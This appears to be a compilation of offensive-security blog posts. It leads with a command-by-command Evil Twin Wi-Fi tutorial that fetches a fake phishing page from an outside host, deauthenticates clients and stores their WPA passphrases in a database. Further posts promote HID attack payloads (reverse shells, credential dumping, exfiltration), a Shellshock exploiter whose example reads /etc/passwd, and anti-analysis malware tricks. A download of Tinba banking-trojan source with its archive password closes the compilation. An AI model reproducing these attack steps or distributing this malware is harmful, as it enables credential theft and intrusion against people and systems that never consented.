Evil Twin Access Point tutorial - Kali-Linux

What is Evil twin access point??

Evil twin access point is a wireless access point that has been installed on a secure network without explicit authorization from a local network administrator, whether added by a well-meaning employee or by a malicious attacker.

To the user, the evil twin looks like a hotspot with a strong signal; that’s because the attacker has not only used the same network name and settings as the “good twin” he is impersonating, he has also physically positioned himself near the end-user so that his signal is likely to be the strongest within range.

If the end-user is tempted by the strong signal and connects manually to the evil twin to access the Internet, or if the user’s computer automatically chooses that connection because it is running in promiscuous mode, the evil twin becomes the user’s Internet access point, giving the attacker the ability to intercept sensitive data such as passwords.


Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.


Step 1:

Login to your kali linux machine.
Establish an internet connection to your host machine.
Now we have to install DHCP server as follows.

Open the terminal and type apt-get install dhcp3-server as show below:

Step 2:

Now we need to configure our DHCP server as below.
Open your terminal and type nano/etc/dhcpd.conf, you should have a blank file opened up on your terminal.

Now type the following shown on the screen shot below

After typing press ctrl+x and then press y and hit enter to save it.


Step 3:

Now download the security update page which the client will see when they open up the web browser.

To do that,

Navigate to, cd /var/www in your terminal and do as follows:

rm index.html
wget http://hackthistv.com/eviltwin.zip
unzip eviltwin.zip
rm eviltwin.zip

Now type the following to start your apache server and mysql:


 /etc/init.d/apache2 start
/etc/init.d/mysql start

Now the mysql is loaded now we have to create a database where we store the WPA/WPA2 password that the client enters into the security update page.

Type the follows:

                mysql -u root
       create database evil_twin;
       use evil_twin

       create table wpa_keys(password varchar(64), confirm                  varchar(64));

In the above screenshot the databse already exists.


Step 5:


Now we need to find our local network adapter interface name and our local ip

Now open the new terminal and type:

ip route (take note of local ip n wired interface)
airmon-ng
airmon-ng start wlan0
clear

NOTE: eth0 is my interface name and 192.168.0.105 is my local ip


airodump-ng-oui-update

airodump-ng -M mon0 (take note of target essid,bssid and channel number)
airbase-ng -e [ESSID] -c [ch. #] -P mon0
NOTE: [ESSID]  is your targets ESSID and [ch. #] targets channel no.

Step 6:

Our evil twin access point is now up and running, we need to configure our tunnel interface so we can create a bridge between our evil twin access point and our wired interface and our tunnel interface is named at0, which was created when we created evil twin access point using airbase..

Don’t close airbase and mysql terminal.

Now open a new terminal and type as follows:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

now we need to add a routing table to enable IP forwarding so we can forward traffic to and fro from our evil twin access point..

so,type the following:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
etc/init.d/isc-dhcp-server start

Step 7:

Now we need to force our clients to connect to our evil twin access point and to accomplish this we need to disconnect the clients by performing the de-authentication attack. To do that first we need to create the blacklist file that contains BSSID of the target.

Do as follows:

echo [BSSID] > blacklist
NOTE:[BSSID] BSSID of the target
mdk3 mon0 d -b blacklist -c [CH.#]

Now go back to airbase terminal to check if any client has connected to your evil twin access point.


If he is connected to the evil twin access point he will see the security page as shown below which asks for password.

Where the client enters his WPA/WPA2 password and clicks on update.

Now go over to the mysql terminal and type

use evil_twin
select * from wpa_keys; {To view the password entered by the victim in our mysql database}

you have successfully harvested the WPA passphrase right from the victim in plain text.

now close all the terminal windows and connect back to the real AP to check whether the password is correct or victim was him/herself was a hacker and tricked you. 


Although you don’t need to name any AP similar to an existing AP you can also create a random free open WiFi type name to gather the client on your AP and start pentesting.


Source: codingsec

By OffensiveSec

Read More

Portable Penetration Testing Distribution for Windows Environments - PentestBox 2.0

PentestBox provides all security tools as a software package, eliminating requirement of Virtual machines or dualboot environments on Windows Operating System.

It is created because more than 50% of penetration testing distribution users uses windows. [Source]

So it provides an efficient platform for Penetration Testing on windows platform.

There are two variants of PentestBox, one without Metasploit and other one with Metasploit.

Antiviruses and Firewalls needs to be switched off to install and operate the version with Metasploit.

Download any of the variant by clicking respective download button present on the right side.

By default installer extract to C:/PentestBox/, and for its proper functioning do not make any changes.

Easy To Use

It is a commandline utility which is all what you want. You can get to know about the commands on tools.pentestbox.com.

Awesome Design

It is the same green font on black terminal but in an modern way.

Best Performance

PentestBox directly runs on host machine instead of virtual machines, so performance is obvious.

No Dependencies Needed

All the dependencies required by tools are inside PentestBox, so you can even run PentestBox on freshly installed windows without any hassle.

Portable

PentestBox is entirely portable, so now you can carry your own Penetration Testing Environment on a USB stick. It will take care of dependencies required to run tools which are inside it.

Linux Environment

PentestBox contains nearly all linux utilities like bash, cat, chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others. It even contains your favourite text editor "vim". For complete list, please look at tools.pentestbox.com/#linux-utilities.

Because of this most of the pentesting tools which were earlier compatible only with Linux are working smoothly in PentestBox.

No Drivers Issue

Windows has already large support of drivers for Graphic Card and wireless. So now you don't have to worry about drivers compaitability issues. For Example now you can use your GPU power to crack hashes using Project RainbowCrack which is particularly not compaitable on linux environment.

Modular

In the making of PentestBox we have included only the best tools , but in that process we have missed some tools which you might want to use. In that case you can easily install those tools using toolsmanager present inside PentestBox, it can install/update/Uninstall tools which are not there in PentestBox.

Less Memory Usage

PentestBox runs on host machine without any need for virtual machine. So it only need's 20 MB for launching compared to atleast 2GB of RAM need for running virtual machine distributions.

Less Disk Usage

It is very light on Disk as well, it only acquires less than third of linux pentesting distro do.

InBuilt Browser

PentestBox contains a version of Mozilla Firefox Browser with nearly all security addons. To know the complete list of addons, please click here.

Cool Update Feature

It contains an update feature through which you can keep your tools updated. To know more about update feature, please click here.

Can be shared on a network

Consider a environment where you want to use PentestBox on many computers like office, lab, etc. Instead of installing PentestBox on each and every computer, you can just install that on one computer and share that folder as a drive to other computers on the same network. Check about this feature here.

Download PentestBox 2.0

Read More

Debugging Toolbar For Rack Applications Implemented As Middleware - Rack-Bug

Rack::Bug adds a diagnostics toolbar to Rack apps. When enabled, it injects a floating div allowing exploration of logging, database queries, template rendering times, etc.


Features

• Password-based security
• IP-based security
• Rack::Bug instrumentation/reporting is broken up into panels.
  • Panels in default configuration:
    • Rails Info
    • Timer
    • Request Variables
    • SQL
    • Active Record
    • Cache
    • Templates
    • Log
    • Memory
  • Other bundled panels:
    • Redis
    • Sphinx
  • The API for adding your own panels is simple and powerful

Rails quick start

script/plugin install git://github.com/brynary/rack-bug.git

In config/environments/development.rb, add:

config.middleware.use "Rack::Bug",
  :secret_key => "someverylongandveryhardtoguesspreferablyrandomstring"

Add the bookmarklet to your browser:

open http://RAILS_APP/__rack_bug__/bookmarklet.html

Using with non-Rails Rack apps

Just 'use Rack::Bug' as any other middleware. See the SampleApp in the spec/fixtures folder for an example Sinatra app.
If you wish to use the logger panel define the LOGGER constant that is a ruby Logger or ActiveSupport::BufferedLogger


Configuring custom panels

Specify the set of panels you want, in the order you want them to appear:

require "rack/bug"

ActionController::Dispatcher.middleware.use Rack::Bug,
  :secret_key => "someverylongandveryhardtoguesspreferablyrandomstring",
  :panel_classes => [
    Rack::Bug::TimerPanel,
    Rack::Bug::RequestVariablesPanel,
    Rack::Bug::RedisPanel,
    Rack::Bug::TemplatesPanel,
    Rack::Bug::LogPanel,
    Rack::Bug::MemoryPanel
  ]

Running Rack::Bug in staging or production

We have have found that Rack::Bug is fast enough to run in production for specific troubleshooting efforts.

Configuration

Add the middleware configuration to an initializer or the appropriate environment files, taking the rest of this section into consideration.

Security

Restrict access to particular IP addresses:

require "ipaddr"

ActionController::Dispatcher.middleware.use "Rack::Bug"
  :secret_key => "someverylongandveryhardtoguesspreferablyrandomstring",
  :ip_masks   => [IPAddr.new("2.2.2.2/0")]

Restrict access using a password:

ActionController::Dispatcher.middleware.use "Rack::Bug",
  :secret_key => "someverylongandveryhardtoguesspreferablyrandomstring",
  :password   => "yourpassword"

Authors

• Maintained by Bryan Helmkamp
• Contributions from Luke Melia, Joey Aghion, Tim Connor, and more

Development

For development, you'll need to install the following gems: rspec, rack-test, webrat, sinatra

Download Rack-Bug

Read More

Automated Security Assessment Reporting Tool - Guinevere

This tool works with Gauntlet (a private tool) to automate assessment reporting.

Main features include:

• Generate Assessment Report
• Export Assessment
• Generate Retest Report
• Generate Pentest Checklist

Generate Assessment Report

This option will generate you .docx report based on the vulnerabilities identified during an assessment. The report will contain a bullet list of findings, the vulnerability report write-up, and a table of interesting hosts to include host names and ports. Each report write up automatically calculates the number of affected hosts and updates the report verbiage accordingly.

Export Assessment

An SQL dump of the assessment data from gauntlet will be export to a .sql file. This file can later be imported into by other analysts.

Generate Retest Report

A .docx retest report will be generated. The tool will evaluate the original assessment findings against the retest findings. The retest findings don't need to be ranked as only the severity level of a vulnerability found in the orginial assessment will be used. New vulnerabilities and new hosts found during the retest will also be ignored. The report will contain a list of vulnerabilities along with their status (Remediated, Partially Remediated, or Not Remediated). A table will also be provided that contains hosts that are still vulnerable. A statistics table is also provided to be used with building graphs or charts.

Generate Pentest Checklist - BETA

The Pentest Checklist is an HTML document used for information managment while conducting a pentest. The generated report provides the analyst with a list of host and their open ports along with space for note taking. This is stil under development and provides basic functionalty. The data is retrieved from the Gauntlet database. The "-T" flag can be used to display out from tools such as Nessus but is very verbose.

Usage

usage: Guinevere.py [-h] [-H DB_HOST] [-U DB_USER] [-P DB_PASS] [-p DB_PORT]
                    [-l LINES] [-A] [-V] [-sC] [-sH] [-sM] [-sL] [-sI] [-aD]
                    [-T]

optional arguments:
  -h, --help            show this help message and exit
  -H DB_HOST, --db-host DB_HOST
                        MySQL Database Host. Default set in script
  -U DB_USER, --db-user DB_USER
                        MySQL Database Username. Default set in script
  -P DB_PASS, --db-pass DB_PASS
                        MySQL Database Password. Default set in script
  -p DB_PORT, --db-port DB_PORT
                        MySQL Database Port. Default set in script
  -l LINES, --lines LINES
                        Number of lines to display when selecting an engagement. Default is 10
  -A, --all-vulns       Include all vulnerability headings when there are no associated report narratives
  -V, --all-verb        Include all vureto vulnerability verbiage when there are no associated report narratives
  -sC                   Exclude Critical-Severity Vulnerabilities
  -sH                   Exclude High-Severity Vulnerabilities
  -sM                   Exclude Medium-Severity Vulnerabilities
  -sL                   Include Low-Severity Vulnerabilities
  -sI                   Include Informational-Severity Vulnerabilities
  -aD, --assessment-date
                        Include the date when selecting an assessment to report on
  -T, --tool-output     Include Tool Output When Printing G-Checklist

Download Guinevere

Read More

Tool for easy use of Human Interface Devices for offensive security and penetration testing - Kautilya

 

Kautilya is a toolkit which provides various payloads for a Human Interface Device which may help in breaking in a computer during penetration tests.

List of Payloads

Windows

Gather

• Gather Information
• Hashdump and Exfiltrate
• Keylog and Exfiltrate
• Sniffer
• WLAN keys dump
• Get Target Credentials
• Dump LSA Secrets
• Dump passwords in plain
• Copy SAM
• Dump Process Memory
• Dump Windows Vault Credentials

Execute

• Download and Execute
• Connect to Hotspot and Execute code
• Code Execution using Powershell
• Code Execution using DNS TXT queries
• Download and Execute PowerShell Script
• Execute ShellCode
• Reverse TCP Shell

Backdoor

• Sethc and Utilman backdoor
• Time based payload execution
• HTTP backdoor
• DNS TXT Backdoor
• Wireless Rogue AP
• Tracking Target Connectivity
• Gupt Backdoor

Escalate

• Remove Update
• Forceful Browsing

Manage

• Add an admin user
• Change the default DNS server
• Edit the hosts file
• Add a user and Enable RDP
• Add a user and Enable Telnet
• Add a user and Enable Powershell Remoting

Drop Files

• Drop a MS Word File
• Drop a MS Excel File
• Drop a CHM (Compiled HTML Help) file
• Drop a Shortcut (.LNK) file
• Drop a JAR file

Misc

• Browse and Accept Java Signed Applet
• Speak on Target

Linux

• Download and Execute
• Reverse Shells using built in tools
• Code Execution
• DNS TXT Code Execution
• Perl reverse shell (MSF)

OSX

• Download and Execute
• DNS TXT Code Execution
• Perl Reverse Shell (MSF)
• Ruby Reverse Shell (MSF)

Payloads Compatibility

• The Windows payloads and modules are written mostly in powershell (in combination with native commands) and are tested on Windows 7 and Windows 8.
  
• The Linux payloads are mostly shell scripts (those installed by default) in combination with commands. These are tested on Ubuntu 11.
  
• The OS X payloads are shell scripts (those installed by default) with usage of native commands. Tested on OS X Lion running on a VMWare
  

Usage

Run kautilya.rb and follow the menus. Kautilya asks for your inputs for various options. The generated payload is copied to the output directory of Kautilya.
The generated payload is an arduino sketch, ready to be used with Arduino IDE. Burn it to Human Interface Device of your choice and have fun!

Supported Human Interface Devices

In principal Kautilya should work with any HID capable of acting as a keyboard. Kautilya has been tested on Teensy++2.0 and Teensy 3.0 from pjrc.com. Updates about Kautilya can be found most of the times at my blog http://labofapenetrationtester.com/ and google group.

User Group

For any queries, discussions and feedback, post to official google group http://groups.google.com/group/kautilya-users or mail me at nikhil d0t uitrgpv at gmail.com

Bugs and Feature requests

Raise an issue or post to the google group.

Dependencies

Kautilya needs colored, highline and artii (and win32console on Windows) gems. Use
bundle install
to install all the required gems.

Download Kautilya

Read More

A JavaScript Static Security Analysis Tool - Jsprime

Today, more and more developers are switching to JavaScript as their first choice of language. The reason is simple JavaScript has now been started to be accepted as the mainstream programming for applications, be it on the web or on the mobile; be it on client-side, be it on the server side. JavaScript flexibility and its loose typing is friendly to developers to create rich applications at an unbelievable speed. Major advancements in the performance of JavaScript interpreters, in recent days, have almost eliminated the question of scalability and throughput from many organizations. So the point is JavaScript is now a really important and powerful language we have today and it's usage growing everyday. From client-side code in web applications it grew to server-side through Node.JS and it's now supported as proper language to write applications on major mobile operating system platforms like Windows 8 apps and the upcoming Firefox OS apps.

But the problem is, many developers practice insecure coding which leads to many client side attacks, out of which DOM XSS is the most infamous. We tried to understand the root cause of this problem and figured out is that there are not enough practically usable tools that can solve real-world problems. Hence as our first attempt towards solving this problem, we want to talk about JSPrime: A JavaScript static analysis tool for the rest of us. It's a very light-weight and very easy to use point-and-click tool! The static analysis tool is based on the very popular Esprima ECMAScript parser by Aria Hidayat.

I would like to highlight some of the interesting features of the tool below:

• JS Library Aware Source & Sinks
• Most dynamic or static analyzers are developed to support native/pure JavaScript which actually is a problem for most developers since the introductions and wide-adoption for JavaScript frameworks/libraries like jQuery, YUI etc. Since these scanners are designed to support pure JavaScript, they fail at understanding the context of the development due to the usage of libraries and produce many false-positives and false-negatives. To solve this we have identified the dangerous user input sources and code execution sink functions for jQuery and YUI, for the initial release and we shall talk about how users can easily extend it for other frameworks.
• Variable & Function Tracing (This feature is a part of our code flow analysis algorithm)
• Variable & Function Scope Aware analysis (This feature is a part of our code flow analysis algorithm)
• Known filter function aware
• OOP & Protoype Compliant
• Minimum False Positive alerts
• Supports minified JavaScript
• Blazing fast performance
• Point and Click :-) (my personal favorite)

Upcoming features:

• Automatic code de-obfuscation & decompression through Hybrid Analysis (Ra.2 improvisation; http://code.google.com/p/ra2-dom-xss-scanner )
• ECMAScript family support (ActionScript 3, Node.JS, WinJS)

Links

• Test Cases
• Sources & Sinks
• BlackHat Slides

Usage

Web Client

Open "index.html" in your browser.

Server-Side (Node.JS)

1. In the terminal type "node server.js"
2. Go to 127.0.0.1:8888 in your browser.

Download Jsprime

Read More

A tool to find and exploit servers vulnerable to Shellshock - Shocker

A tool to find and exploit servers vulnerable to Shellshock

Help Text

usage: shocker.py
-h, --help show this help message and exit
--Host HOST, -H HOST A target hostname or IP address
--file FILE, -f FILE File containing a list of targets
--port PORT, -p PORT The target port number (default=80)
--exploit EXPLOIT, -e EXPLOIT Command to execute (default=/bin/uname -a)
--cgi CGI, -c CGI Single CGI to check (e.g. /cgi-bin/test.cgi)
--proxy PROXY A BIT BROKEN RIGHT NOW Proxy to be used in the form 'ip:port'
--ssl, -s Use SSL (default=False)
--threads THREADS, -t THREADS Maximum number of threads (default=10, max=100)
--verbose, -v Be verbose in output

Usage Examples

./shocker.py -H 127.0.0.1 -e "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi
Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat /etc/passwd
./shocker.py -H www.example.com -p 8001 -s
Scan www.example.com on port 8001 using SSL for all scripts in cgi_list and attempts the default exploit for any found
./shocker.py -f ./hostlist
Scans all hosts listed in the file ./hostlist with the default options

Dependencies

Python 2.7+

Change Log

Changes in version 0.72 (December 2014)

• Minor corrections to logic and typos

Changes in version 0.71 (December 2014)

• Added timeout to urllib2.urlopen requests using a global 'TIMEOUT'

Changes in version 0.7 (November 2014)

• Add interactive 'psuedo console' for further exploitation of a chosen vulnerable server
• Attemped to clean up output buffering issues by wrapping sys.stdout in a class which flushes on every call to write
• Added a progress indicator for use in time consuming tasks to reassure non vebose users

Changes in version 0.6 (October 2014)

• Preventing return codes other than 200 from being considered successes
• Added ability to specify multiple targets in a file
• Moved the 'cgi_list' list of scripts to attempt to exploit to a file
• Fixed some output formatting issues
• Fixed valid hostname/IP regex to allow single word hostnames

Changes in version 0.5 (October 2014)

• Added ability to specify a single script to target rather than using cgi_list
• Introduced a timeout on socket operations for host_check
• Added some usage examples in the script header
• Added an epilogue to the help text indicating presence of examples

Changes in version 0.4 (October 2014)

• Introduced a thread count limit defaulting to 10
• Removed colour support until I can figure out how to make it work in Windows and *nix equally well
• Spelling corrections
• More comprehensive cgi_list
• Removes success_flag from output

Pre 0.4 (October 2014)

• No idea

TODO

• Identify and respond correctly to HTTP/200 response - false positives - Low priority/hassle
• Implement curses for *nix systems - For the whole application or only psuedo terminal? - Low priority/prettiness
• Thread the initial host check now that multiple targets are supported (and could be make this bit time consuming)
• Change verbose to integer value - quiet, normal, verbose, debug?
• Add option to skip initial host checks for the sake of speed?
• Add a summary of results before exiting
• Save results to a file? Format?
• Eventually the idea is to include multiple possible vectors but currently only one is checked.
• Add Windows and *nix colour support - Low priority/prettiness
• Add a timeout in interactive mode for commands which don't return, e.g. /bin/cat /dev/zero
• Prettify - Low priority/pretinness (obviously)
• Add support for scanning and explointing SSH and SMTP? https://isc.sans.edu/diary/Shellshock+via+SMTP/18879
• Add SOCKS proxy support, potentially using https://github.com/rpicard/socksonsocks/ from Rober Picard
• Other stuff. Probably.

Download Shocker

Read More

Public Malware Techniques Used In The Wild - Al-Khaser

al-khaser is a PoC malware with good intentions that aimes to stress your anti-malware system. It performs a bunch of nowadays malwares tricks and the goal is to see if you catch them all.

Possible uses

• You are making an anti-debug plugin and you want to check its effectiveness.
• You want to ensure that your sandbox solution is hidden enough.
• Or you want to ensure that your malware analysis environement is well hidden.

Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don't hesitate to contribute.

Features

Anti-debugging attacks

• IsDebuggerPresent
• CheckRemoteDebuggerPresent
• Process Environement Block (BeingDebugged)
• Process Environement Block (NtGlobalFlag)
• ProcessHeap (Flags)
• ProcessHeap (ForceFlags)
• NtQueryInformationProcess (ProcessDebugPort)
• NtQueryInformationProcess (ProcessDebugFlags)
• NtQueryInformationProcess (ProcessDebugObject)
• NtSetInformationThread (HideThreadFromDebugger)
• NtQueryObject (ObjectTypeInformation)
• NtQueryObject (ObjectAllTypesInformation)
• CloseHanlde (NtClose) Invalide Handle
• UnhandledExceptionFilter
• OutputDebugString (GetLastError())
• Hardware Breakpoints (SEH / GetThreadContext)
• Software Breakpoints (INT3 / 0xCC)
• Memory Breakpoints (PAGE_GUARD)
• Interrupt 0x2d
• Interrupt 1
• Parent Process (Explorer.exe)
• SeDebugPrivilege (Csrss.exe)
• NtYieldExecution / SwitchToThread

Anti-virtualization

• Virtualbox registry key values artifacts:
  • "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier)
  • HARDWARE\Description\System (SystemBiosVersion)
  • HARDWARE\Description\System (VideoBiosVersion)
  • HARDWARE\Description\System (SystemBiosDate)
• Virtualbox registry Keys artifacts
  • "HARDWARE\ACPI\RSDT\VBOX__"
  • "HARDWARE\ACPI\FADT\VBOX__"
  • "HARDWARE\ACPI\RSDT\VBOX__"
  • "SOFTWARE\Oracle\VirtualBox Guest Additions"
  • "SYSTEM\ControlSet001\Services\VBoxGuest"
  • "SYSTEM\ControlSet001\Services\VBoxMouse"
  • "SYSTEM\ControlSet001\Services\VBoxService"
  • "SYSTEM\ControlSet001\Services\VBoxSF"
  • "SYSTEM\ControlSet001\Services\VBoxVideo"
• Virtualbox file system artifacts:
  • "system32\drivers\VBoxMouse.sys"
  • "system32\drivers\VBoxGuest.sys"
  • "system32\drivers\VBoxSF.sys"
  • "system32\drivers\VBoxVideo.sys"
  • "system32\vboxdisp.dll"
  • "system32\vboxhook.dll"
  • "system32\vboxmrxnp.dll"
  • "system32\vboxogl.dll"
  • "system32\vboxoglarrayspu.dll"
  • "system32\vboxoglcrutil.dll"
  • "system32\vboxoglerrorspu.dll"
  • "system32\vboxoglfeedbackspu.dll"
  • "system32\vboxoglpackspu.dll"
  • "system32\vboxoglpassthroughspu.dll"
  • "system32\vboxservice.exe"
  • "system32\vboxtray.exe"
  • "system32\VBoxControl.exe"
• Virtualbox directories artifacts:
  • "oracle\virtualbox guest additions\"
• Virtualbox MAC Address:
  • "\x08\x00\x27"
• Virtualbox virtual devices:
  • "\\.\VBoxMiniRdrDN"
  • "\\.\VBoxGuest"
  • "\\.\pipe\VBoxMiniRdDN"
  • "\\.\VBoxTrayIPC"
  • "\\.\pipe\VBoxTrayIPC")
• Virtualbox Windows Class
  • VBoxTrayToolWndClass
  • VBoxTrayToolWnd
• Virtualbox network share
  • VirtualBox Shared Folders
• Virtualbox process list
  • vboxservice.exe
  • vboxtray.exe

Anti Dumping

• Erase PE header from memory

Code/DLL Injections techniques

• CreateRemoteThread
• SetWindowsHooksEx
• NtCreateThreadEx
• RtlCreateUserThread
• APC (QueueUserAPC / NtQueueApcThread)
• RunPE (GetThreadContext / SetThreadContext)

Timing Attacks

• Sleep -> SleepEx -> NtDelayExecution
• SetTimer (Standard Windows Timers)
• timeSetEvent (Multimedia Timers)

Download Al-Khaser

Read More

Tiny banker aka Tinba Source - Trojan Banker

Obs. I am not responsible for their actions, test in the virtual machine for not damage your real system.


Tinba got its name from its extraordinarily small size – its code is approximately 20 kilobytes in size, a remarkably small number for banking malware. Tinba is a combination of the words tiny and banker; the same malware is also known as Tinybanker and Zusy.

The program  encrypted with pass code and key file to security

Pass: offensivesec

Download Tiny Banker

Read More